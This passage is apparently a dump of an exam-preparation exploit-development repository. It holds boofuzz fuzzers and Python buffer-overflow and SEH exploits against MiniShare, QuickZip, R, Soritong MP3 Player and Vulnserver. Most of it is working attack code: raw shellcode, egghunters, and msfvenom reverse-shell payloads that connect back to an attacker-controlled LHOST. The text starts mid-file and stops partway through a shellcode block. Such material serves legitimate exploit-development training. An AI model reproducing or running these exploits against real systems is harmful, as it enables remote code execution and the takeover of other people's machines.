name="return-6", fuzzable = False) 42 | s_string("User-Agent:", name="User-Agent", fuzzable = False) 43 | s_delim(" ", name="space-8", fuzzable = False) 44 | s_string("Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", name="User-Agent-Value", fuzzable = False) 45 | s_delim("\r\n", name="return-7", fuzzable = False) 46 | s_string("Accept-Encoding:", name="Accept-Encoding", fuzzable = False) 47 | s_delim(" ", name="space-9", fuzzable = False) 48 | s_string("gzip, deflate, sdch", name="Accept-Encoding-Value", fuzzable = False) 49 | s_delim("\r\n", name="return-8", fuzzable = False) 50 | s_string("Accept-Language:", name="Accept-Language", fuzzable = False) 51 | s_delim(" ", name="space-10", fuzzable = False) 52 | s_string("tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4", name="Accept-Language-Value", fuzzable = False) 53 | s_delim("\r\n", name="return-9", fuzzable = False) 54 | s_string("Cookie:", name="Cookie", fuzzable = False) 55 | s_delim(" ", name="space-11", fuzzable = False) 56 | s_string("session_id=rG5JfL3QVJkEUhqKankXrO6cwwLok8", name="Cookie-Value", fuzzable = False) 57 | s_delim("\r\n", name="return-10", fuzzable = False) 58 | s_static("\r\n", name="Request-Line-CRLF") 59 | s_static("\r\n", "Request-CRLF") 60 | 61 | session.connect(s_get("Request")) 62 | 63 | session.fuzz() 64 | 65 | 66 | if __name__ == "__main__": 67 | main() 68 | -------------------------------------------------------------------------------- /Minishare/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os,sys,socket 4 | 5 | ip = "192.168.1.9" 6 | port = 80 7 | 8 | # bad \x0d 9 | 10 | offset = "A"*1787 11 | eip = "\x53\x93\x42\x7E" # user32.dll JMP ESP 7E429353 12 | nops = "\x90"*30 13 | shellcode = "" 14 | shellcode += "\xd9\xc8\xd9\x74\x24\xf4\x5a\x29\xc9\xb8\x45\x6b" 15 | shellcode += "\x73\x7f\xb1\x52\x83\xea\xfc\x31\x42\x13\x03\x07" 16 | shellcode += "\x78\x91\x8a\x7b\x96\xd7\x75\x83\x67\xb8\xfc\x66" 17 | shellcode += "\x56\xf8\x9b\xe3\xc9\xc8\xe8\xa1\xe5\xa3\xbd\x51" 18 | shellcode += "\x7d\xc1\x69\x56\x36\x6c\x4c\x59\xc7\xdd\xac\xf8" 19 | shellcode += "\x4b\x1c\xe1\xda\x72\xef\xf4\x1b\xb2\x12\xf4\x49" 20 | shellcode += "\x6b\x58\xab\x7d\x18\x14\x70\xf6\x52\xb8\xf0\xeb" 21 | shellcode += "\x23\xbb\xd1\xba\x38\xe2\xf1\x3d\xec\x9e\xbb\x25" 22 | shellcode += "\xf1\x9b\x72\xde\xc1\x50\x85\x36\x18\x98\x2a\x77" 23 | shellcode += "\x94\x6b\x32\xb0\x13\x94\x41\xc8\x67\x29\x52\x0f" 24 | shellcode += "\x15\xf5\xd7\x8b\xbd\x7e\x4f\x77\x3f\x52\x16\xfc" 25 | shellcode += "\x33\x1f\x5c\x5a\x50\x9e\xb1\xd1\x6c\x2b\x34\x35" 26 | shellcode += "\xe5\x6f\x13\x91\xad\x34\x3a\x80\x0b\x9a\x43\xd2" 27 | shellcode += "\xf3\x43\xe6\x99\x1e\x97\x9b\xc0\x76\x54\x96\xfa" 28 | shellcode += "\x86\xf2\xa1\x89\xb4\x5d\x1a\x05\xf5\x16\x84\xd2" 29 | shellcode += "\xfa\x0c\x70\x4c\x05\xaf\x81\x45\xc2\xfb\xd1\xfd" 30 | shellcode += "\xe3\x83\xb9\xfd\x0c\x56\x6d\xad\xa2\x09\xce\x1d" 31 | shellcode += "\x03\xfa\xa6\x77\x8c\x25\xd6\x78\x46\x4e\x7d\x83" 32 | shellcode += "\x01\xb1\x2a\x8a\xd9\x59\x29\x8c\xfb\xca\xa4\x6a" 33 | shellcode += "\x91\xfc\xe0\x25\x0e\x64\xa9\xbd\xaf\x69\x67\xb8" 34 | shellcode += "\xf0\xe2\x84\x3d\xbe\x02\xe0\x2d\x57\xe3\xbf\x0f" 35 | shellcode += "\xfe\xfc\x15\x27\x9c\x6f\xf2\xb7\xeb\x93\xad\xe0" 36 | shellcode += "\xbc\x62\xa4\x64\x51\xdc\x1e\x9a\xa8\xb8\x59\x1e" 37 | shellcode += "\x77\x79\x67\x9f\xfa\xc5\x43\x8f\xc2\xc6\xcf\xfb" 38 | shellcode += "\x9a\x90\x99\x55\x5d\x4b\x68\x0f\x37\x20\x22\xc7" 39 | shellcode += "\xce\x0a\xf5\x91\xce\x46\x83\x7d\x7e\x3f\xd2\x82" 40 | shellcode += "\x4f\xd7\xd2\xfb\xad\x47\x1c\xd6\x75\x77\x57\x7a" 41 | shellcode += "\xdf\x10\x3e\xef\x5d\x7d\xc1\xda\xa2\x78\x42\xee" 42 | shellcode += "\x5a\x7f\x5a\x9b\x5f\x3b\xdc\x70\x12\x54\x89\x76" 43 | shellcode += "\x81\x55\x98" 44 | 45 | 46 | buffer = offset + eip + nops + shellcode 47 | 48 | request = "GET " + buffer + " HTTP/1.1\r\n\r\n" 49 | 50 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 51 | s.connect((ip,port)) 52 | s.send(request) 53 | s.close() 54 | -------------------------------------------------------------------------------- /Minishare/fuzz: -------------------------------------------------------------------------------- 1 | GET / HTTP/1.1 2 | Host: 127.0.0.1 3 | Connection: keep-alive 4 | Pragma: no-cache 5 | Cache-Control: no-cache 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 9 | Accept-Encoding: gzip, deflate, sdch 10 | Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 11 | 12 | python boo-gen.py get.txt --get 13 | Start by testing / after GET and before HTTP/1.1 14 | 15 | -------------------------------------------------------------------------------- /ProSysInfo TFTP Server TFTPDWIN 0.4.2/fuzz.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | import time 4 | 5 | host = '' 6 | port = 69 7 | 8 | buffer=["A"] 9 | counter=25 10 | while len(buffer) <=400: 11 | buffer.append("A"*counter) 12 | counter=counter+25 13 | 14 | for string in buffer: 15 | try: 16 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 17 | except: 18 | print "Socket() failed" 19 | sys.exit(1) 20 | filename = string 21 | mode = "netascii" 22 | payload = "\x00\x02" + filename + "\0" + mode+ "\0" 23 | s.sendto(payload, (host, port)) 24 | time.sleep(1) 25 | -------------------------------------------------------------------------------- /QuickZip 4.60/explanation: -------------------------------------------------------------------------------- 1 | | Encoded shellcode | 0012FAF0 2 | | | 3 | | | 4 | | | 5 | | A buffer start | 0012FB63 6 | | | 7 | | | 8 | | jmp here (seh) | 0012FB81 9 | | | 10 | | shellcode_to_edx | 0012FB85 (edx=12faf0 holds shellcode) 11 | | | 12 | | stack align | 0012FBA0 (esp = 12FBF8) 13 | | | 14 | | jmp_edx | 0012FBB3 (esp = 12FBF4) 15 | | | 16 | | | 17 | | B buffer start | 0012FBCD 18 | | | 19 | | | 20 | | | 21 | | | 22 | | | 23 | | JMP EDX | 0012FBF6 (jump to 0012FAF0) 24 | | | 25 | | | 26 | | A buffer ends | 0012FBFB 27 | | JMP back (nseh) | 0012FBFC 28 | -------------------------------------------------------------------------------- /QuickZip 4.60/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 4 | "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00") 5 | 6 | header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 7 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00" 8 | "\x24\x00\x00\x00\x00\x00\x00\x00") 9 | 10 | header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" 11 | "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00") 12 | 13 | # 710 bytes 14 | shellcode = "w00tw00t" 15 | shellcode += "\x89\xe1\xdb\xda\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" 16 | shellcode += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" 17 | shellcode += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" 18 | shellcode += "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" 19 | shellcode += "\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x4f\x72\x57\x70\x35\x50" 20 | shellcode += "\x77\x70\x65\x30\x4f\x79\x69\x75\x64\x71\x6b\x70\x50\x64" 21 | shellcode += "\x4e\x6b\x36\x30\x30\x30\x4e\x6b\x70\x52\x34\x4c\x6c\x4b" 22 | shellcode += "\x72\x72\x76\x74\x6e\x6b\x62\x52\x37\x58\x44\x4f\x6d\x67" 23 | shellcode += "\x50\x4a\x66\x46\x75\x61\x4b\x4f\x6c\x6c\x77\x4c\x71\x71" 24 | shellcode += "\x31\x6c\x77\x72\x44\x6c\x57\x50\x6b\x71\x7a\x6f\x64\x4d" 25 | shellcode += "\x57\x71\x48\x47\x7a\x42\x4c\x32\x52\x72\x46\x37\x6e\x6b" 26 | shellcode += "\x43\x62\x34\x50\x4e\x6b\x32\x6a\x77\x4c\x4e\x6b\x32\x6c" 27 | shellcode += "\x67\x61\x31\x68\x48\x63\x53\x78\x37\x71\x6e\x31\x43\x61" 28 | shellcode += "\x6c\x4b\x53\x69\x35\x70\x66\x61\x4a\x73\x4e\x6b\x50\x49" 29 | shellcode += "\x37\x68\x7a\x43\x35\x6a\x47\x39\x4e\x6b\x46\x54\x6c\x4b" 30 | shellcode += "\x56\x61\x48\x56\x30\x31\x79\x6f\x6c\x6c\x79\x51\x38\x4f" 31 | shellcode += "\x74\x4d\x53\x31\x5a\x67\x70\x38\x79\x70\x71\x65\x39\x66" 32 | shellcode += "\x34\x43\x51\x6d\x4b\x48\x77\x4b\x51\x6d\x45\x74\x64\x35" 33 | shellcode += "\x59\x74\x70\x58\x4e\x6b\x53\x68\x75\x74\x36\x61\x68\x53" 34 | shellcode += "\x33\x56\x6e\x6b\x74\x4c\x30\x4b\x6e\x6b\x63\x68\x67\x6c" 35 | shellcode += "\x57\x71\x5a\x73\x4c\x4b\x34\x44\x6c\x4b\x53\x31\x58\x50" 36 | shellcode += "\x6e\x69\x63\x74\x66\x44\x44\x64\x63\x6b\x31\x4b\x61\x71" 37 | shellcode += "\x70\x59\x51\x4a\x56\x31\x39\x6f\x6d\x30\x51\x4f\x31\x4f" 38 | shellcode += "\x51\x4a\x6c\x4b\x32\x32\x7a\x4b\x6e\x6d\x73\x6d\x42\x48" 39 | shellcode += "\x30\x33\x67\x42\x53\x30\x75\x50\x55\x38\x31\x67\x32\x53" 40 | shellcode += "\x76\x52\x51\x4f\x73\x64\x73\x58\x52\x6c\x50\x77\x47\x56" 41 | shellcode += "\x53\x37\x4b\x4f\x4b\x65\x68\x38\x6e\x70\x36\x61\x73\x30" 42 | shellcode += "\x77\x70\x31\x39\x6a\x64\x43\x64\x50\x50\x33\x58\x76\x49" 43 | shellcode += "\x4b\x30\x72\x4b\x55\x50\x59\x6f\x48\x55\x76\x30\x36\x30" 44 | shellcode += "\x52\x70\x32\x70\x73\x70\x52\x70\x37\x30\x62\x70\x72\x48" 45 | shellcode += "\x78\x6a\x54\x4f\x59\x4f\x4b\x50\x4b\x4f\x69\x45\x4c\x57" 46 | shellcode += "\x31\x7a\x44\x45\x50\x68\x79\x50\x4d\x78\x67\x71\x32\x31" 47 | shellcode += "\x55\x38\x67\x72\x47\x70\x64\x51\x61\x4c\x6c\x49\x68\x66" 48 | shellcode += "\x30\x6a\x36\x70\x42\x76\x73\x67\x55\x38\x4c\x59\x6c\x65" 49 | shellcode += "\x51\x64\x53\x51\x79\x6f\x6b\x65\x4f\x75\x6b\x70\x50\x74" 50 | shellcode += "\x74\x4c\x69\x6f\x70\x4e\x56\x68\x74\x35\x68\x6c\x73\x58" 51 | shellcode += "\x38\x70\x78\x35\x59\x32\x30\x56\x6b\x4f\x4e\x35\x31\x78" 52 | shellcode += "\x63\x53\x50\x6d\x70\x64\x35\x50\x4f\x79\x7a\x43\x72\x77" 53 | shellcode += "\x71\x47\x42\x77\x70\x31\x78\x76\x33\x5a\x77\x62\x52\x79" 54 | shellcode += "\x31\x46\x49\x72\x39\x6d\x63\x56\x6f\x37\x47\x34\x37\x54" 55 | shellcode += "\x57\x4c\x57\x71\x45\x51\x6c\x4d\x31\x54\x46\x44\x64\x50" 56 | shellcode += "\x7a\x66\x73\x30\x33\x74\x66\x34\x32\x70\x62\x76\x66\x36" 57 | shellcode += "\x30\x56\x53\x76\x62\x76\x30\x4e\x42\x76\x63\x66\x71\x43" 58 | shellcode += "\x53\x66\x55\x38\x70\x79\x5a\x6c\x67\x4f\x6b\x36\x59\x6f" 59 | shellcode += "\x78\x55\x6b\x39\x39\x70\x30\x4e\x61\x46\x52\x66\x39\x6f" 60 | shellcode += "\x70\x30\x32\x48\x74\x48\x6d\x57\x65\x4d\x53\x50\x69\x6f" 61 | shellcode += "\x4b\x65\x4d\x6b\x4c\x30\x78\x35\x39\x32\x52\x76\x63\x58" 62 | shellcode += "\x4e\x46\x4f\x65\x6d\x6d\x6d\x4d\x6b\x4f\x38\x55\x45\x6c" 63 | shellcode += "\x57\x76\x53\x4c\x77\x7a\x6b\x30\x4b\x4b\x79\x70\x54\x35" 64 | shellcode += "\x67\x75\x4f\x4b\x50\x47\x74\x53\x30\x72\x62\x4f\x50\x6a" 65 | shellcode += "\x67\x70\x72\x73\x6b\x4f\x59\x45\x41\x41" 66 | 67 | # 117 bytes 68 | #egghunter = ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA") 69 | 70 | egghunter = ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FmQIZYoFoPB0Rpj321HhMfNUl4ERzbTzOOHPwp0FPCDLK8zlo3ExjloBUIwYom7AA") 71 | 72 | # 27 bytes 73 | shellcode_to_edx = ("\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5a\x56\x4e\x55\x2d\x5a\x56\x4e\x55\x2d\x5c\x58\x50\x55\x50\x5A") 74 | 75 | # 19 bytes 76 | decode_stack_alignment = ("\x54\x58\x2d\x42\x53\x55\x55\x2d\x42\x53\x55\x55\x2d\x44\x53\x55\x55\x50\x5c") 77 | 78 | # 26 bytes 79 | encoded_jmp_edx = ("\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x25\x55\x5e\x2d\x25\x25\x55\x5e\x2d\x26\x25\x56\x60\x50") 80 | 81 | # 171 - 117 = 54/2 = 27 82 | offset = "A"*26 + egghunter + "A"*28 83 | offset += "B" * 4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edx 84 | offset += "C"*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx)) 85 | nseh = "\x71\x9f\x70\x9f" 86 | seh = "\x33\x28\x42\x00" #00422833 87 | 88 | junk = "D"* 4 + shellcode+ "D"* (4064-294-4-4-4-len(shellcode)) 89 | payload = offset + nseh + seh + junk 90 | payload += ".txt" 91 | 92 | exploit = header_1 + payload + header_2 + payload + header_3 93 | 94 | myfile = open('try.zip','w'); 95 | myfile.write(exploit); 96 | myfile.close() 97 | -------------------------------------------------------------------------------- /R v3.4.4/exploit.py: -------------------------------------------------------------------------------- 1 | filename = "r.txt" 2 | 3 | offset = "A"*900 4 | nseh = "\xeb\x0b\x90\x90" 5 | seh = "\x1C\x08\xC0\x6C" # pop-pop-ret from R.dll 6 | nops = "\x90" *24 7 | 8 | # \x00\x0d 9 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 10 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 11 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 12 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 13 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 14 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 15 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 16 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 17 | "\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 18 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 19 | "\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 20 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 21 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 22 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 23 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 24 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 25 | "\x63\x03\x6b") 26 | 27 | 28 | buffer = offset + nseh + seh + nops + calc 29 | 30 | f = open(filename,'w') 31 | f.write(buffer) 32 | f.close() 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCE-Exploit-Development 2 | 3 | Hi guys, 4 | 5 | These are some exploits I write during my OSCE preparation. Hope it will be helpful for people preparing for the OSCE exam & people new to exploit development. 6 | 7 | As always: 8 | 9 | May the Force be with you! 10 | -------------------------------------------------------------------------------- /Ricoh DC Software DL-10 FTP Server/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # boofuzz template for Solar FTP 2.1.1 PASV command 3 | 4 | from boofuzz import * 5 | 6 | host = "192.168.1.10" 7 | port = 21 8 | 9 | def main(): 10 | session = Session(target=Target(connection=SocketConnection(host, port, proto='tcp'))) 11 | 12 | s_initialize("user") 13 | s_static("USER") 14 | s_delim(" ") 15 | s_string("anonymous") 16 | s_static("\r\n") 17 | 18 | s_initialize("pass") 19 | s_static("PASS") 20 | s_delim(" ") 21 | s_static("test") 22 | s_static("\r\n") 23 | 24 | session.connect(s_get("user")) 25 | session.connect(s_get("user"), s_get("pass")) 26 | 27 | session.fuzz() 28 | if __name__ == "__main__": 29 | main() 30 | -------------------------------------------------------------------------------- /SolarFTP/fuzz.py: -------------------------------------------------------------------------------- 1 | from boofuzz import * 2 | host = "192.168.1.6" 3 | port = 21 4 | start_cmd = "net start \"Solar FTP Server\"" 5 | stop_cmd = "net stop \"Solar FTP Server\"" 6 | proc_name = "sfsservice.exe" 7 | def main(): 8 | session = Session( 9 | target=Target( 10 | connection=SocketConnection(host, port, proto='tcp'), 11 | procmon=pedrpc.Client(host, 26002), 12 | procmon_options={ 13 | "proc_name": proc_name, 14 | "stop_commands": [start_cmd], 15 | "start_commands": [start_cmd] 16 | } 17 | ), 18 | web_port =8080) 19 | 20 | s_initialize("user") 21 | s_static("USER") 22 | s_delim(" ") 23 | s_static("test") 24 | s_static("\r\n") 25 | 26 | s_initialize("pass") 27 | s_static("PASS") 28 | s_delim(" ") 29 | s_string("test") 30 | s_static("\r\n") 31 | 32 | s_initialize("pasv") 33 | s_static("PASV") 34 | s_delim(" ") 35 | s_string("Fuzz") 36 | s_static("\r\n") 37 | session.connect(s_get("user")) 38 | session.connect(s_get("user"), s_get("pass")) 39 | session.connect(s_get("pass"), s_get("pasv")) 40 | 41 | session.fuzz() 42 | if __name__ == "__main__": 43 | main() 44 | -------------------------------------------------------------------------------- /Soritong MP3 Player 1.0/exploit.py: -------------------------------------------------------------------------------- 1 | path = "UI.txt" 2 | 3 | buffer = "A" * 584 4 | 5 | buffer += "\xeb\x06\x90\x90" # next SEH overwrite - breakpoint 6 | buffer += "\x12\xE8\x01\x10" #pop pop ret from player.dll 7 | 8 | # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com 9 | buffer += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46\x4e\x36\x43\x46\x42\x50\x5a"; 10 | 11 | buffer += "\x90" *1000 # nop sled 12 | 13 | file = open (path, "w") 14 | file.write(buffer) 15 | file.close() 16 | -------------------------------------------------------------------------------- /Soritong MP3 Player 1.0/payload.py: -------------------------------------------------------------------------------- 1 | path = "C:\Program Files\SoriTong\Skin\Default\UI.txt" 2 | buffer = "A" * 5000 3 | file = open (path, "w") 4 | file.write(buffer) 5 | file.close() 6 | -------------------------------------------------------------------------------- /Vulnserver/gmon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | host = "192.168.1.4" 8 | port = 9999 9 | 10 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=6767 EXITFUNC=thread -b "\x00" -f c 11 | shellcode = "kalikali" 12 | shellcode += ("\xdd\xc0\xbb\x49\xc9\x16\x1b\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 13 | "\x52\x31\x5e\x17\x83\xee\xfc\x03\x17\xda\xf4\xee\x5b\x34\x7a" 14 | "\x10\xa3\xc5\x1b\x98\x46\xf4\x1b\xfe\x03\xa7\xab\x74\x41\x44" 15 | "\x47\xd8\x71\xdf\x25\xf5\x76\x68\x83\x23\xb9\x69\xb8\x10\xd8" 16 | "\xe9\xc3\x44\x3a\xd3\x0b\x99\x3b\x14\x71\x50\x69\xcd\xfd\xc7" 17 | "\x9d\x7a\x4b\xd4\x16\x30\x5d\x5c\xcb\x81\x5c\x4d\x5a\x99\x06" 18 | "\x4d\x5d\x4e\x33\xc4\x45\x93\x7e\x9e\xfe\x67\xf4\x21\xd6\xb9" 19 | "\xf5\x8e\x17\x76\x04\xce\x50\xb1\xf7\xa5\xa8\xc1\x8a\xbd\x6f" 20 | "\xbb\x50\x4b\x6b\x1b\x12\xeb\x57\x9d\xf7\x6a\x1c\x91\xbc\xf9" 21 | "\x7a\xb6\x43\x2d\xf1\xc2\xc8\xd0\xd5\x42\x8a\xf6\xf1\x0f\x48" 22 | "\x96\xa0\xf5\x3f\xa7\xb2\x55\x9f\x0d\xb9\x78\xf4\x3f\xe0\x14" 23 | "\x39\x72\x1a\xe5\x55\x05\x69\xd7\xfa\xbd\xe5\x5b\x72\x18\xf2" 24 | "\x9c\xa9\xdc\x6c\x63\x52\x1d\xa5\xa0\x06\x4d\xdd\x01\x27\x06" 25 | "\x1d\xad\xf2\x89\x4d\x01\xad\x69\x3d\xe1\x1d\x02\x57\xee\x42" 26 | "\x32\x58\x24\xeb\xd9\xa3\xaf\xd4\xb6\xaa\x25\xbd\xc4\xac\x23" 27 | "\x52\x40\x4a\x39\xbc\x04\xc5\xd6\x25\x0d\x9d\x47\xa9\x9b\xd8" 28 | "\x48\x21\x28\x1d\x06\xc2\x45\x0d\xff\x22\x10\x6f\x56\x3c\x8e" 29 | "\x07\x34\xaf\x55\xd7\x33\xcc\xc1\x80\x14\x22\x18\x44\x89\x1d" 30 | "\xb2\x7a\x50\xfb\xfd\x3e\x8f\x38\x03\xbf\x42\x04\x27\xaf\x9a" 31 | "\x85\x63\x9b\x72\xd0\x3d\x75\x35\x8a\x8f\x2f\xef\x61\x46\xa7" 32 | "\x76\x4a\x59\xb1\x76\x87\x2f\x5d\xc6\x7e\x76\x62\xe7\x16\x7e" 33 | "\x1b\x15\x87\x81\xf6\x9d\xa7\x63\xd2\xeb\x4f\x3a\xb7\x51\x12" 34 | "\xbd\x62\x95\x2b\x3e\x86\x66\xc8\x5e\xe3\x63\x94\xd8\x18\x1e" 35 | "\x85\x8c\x1e\x8d\xa6\x84") 36 | 37 | 38 | # 32 bytes egg=kali 39 | egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 40 | "\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 41 | 42 | offset = shellcode + "A"*(3494-32-16-len(shellcode)) 43 | offset += egghunter # 32 bytes 44 | offset += "A"*(16) # 16 bytes 45 | nseh = "\xeb\xce\x90\x90" #jmp back -48=\xce 46 | seh = "\x2B\x17\x50\x62" #6250172B 47 | #jmp_back = "\x54\x58\x66\x05\xE6\x03\xFF\xE0" 48 | 49 | buffer = offset + nseh + seh + "C"*(5012-len(offset)-8) 50 | 51 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 52 | s.connect((host,port)) 53 | print s.recv(1024) 54 | s.send("GMON /.../" + buffer) 55 | print s.recv(1024) 56 | s.close() 57 | -------------------------------------------------------------------------------- /Vulnserver/others: -------------------------------------------------------------------------------- 1 | Lter and KSTET are explained in my blog: 2 | https://areyou1or0.blogspot.com 3 | -------------------------------------------------------------------------------- /Vulnserver/trun-exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | host="192.168.1.104" 8 | port=9999 9 | 10 | # bad: \x00 11 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.106 LPORT=6767 --platform windows -a x86 -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode 12 | 13 | shellcode = "" 14 | shellcode += "\xdb\xd5\xd9\x74\x24\xf4\xb8\x19\xf2\x1e\x37\x5e" 15 | shellcode += "\x2b\xc9\xb1\x52\x31\x46\x17\x03\x46\x17\x83\xdf" 16 | shellcode += "\xf6\xfc\xc2\x23\x1e\x82\x2d\xdb\xdf\xe3\xa4\x3e" 17 | shellcode += "\xee\x23\xd2\x4b\x41\x94\x90\x19\x6e\x5f\xf4\x89" 18 | shellcode += "\xe5\x2d\xd1\xbe\x4e\x9b\x07\xf1\x4f\xb0\x74\x90" 19 | shellcode += "\xd3\xcb\xa8\x72\xed\x03\xbd\x73\x2a\x79\x4c\x21" 20 | shellcode += "\xe3\xf5\xe3\xd5\x80\x40\x38\x5e\xda\x45\x38\x83" 21 | shellcode += "\xab\x64\x69\x12\xa7\x3e\xa9\x95\x64\x4b\xe0\x8d" 22 | shellcode += "\x69\x76\xba\x26\x59\x0c\x3d\xee\x93\xed\x92\xcf" 23 | shellcode += "\x1b\x1c\xea\x08\x9b\xff\x99\x60\xdf\x82\x99\xb7" 24 | shellcode += "\x9d\x58\x2f\x23\x05\x2a\x97\x8f\xb7\xff\x4e\x44" 25 | shellcode += "\xbb\xb4\x05\x02\xd8\x4b\xc9\x39\xe4\xc0\xec\xed" 26 | 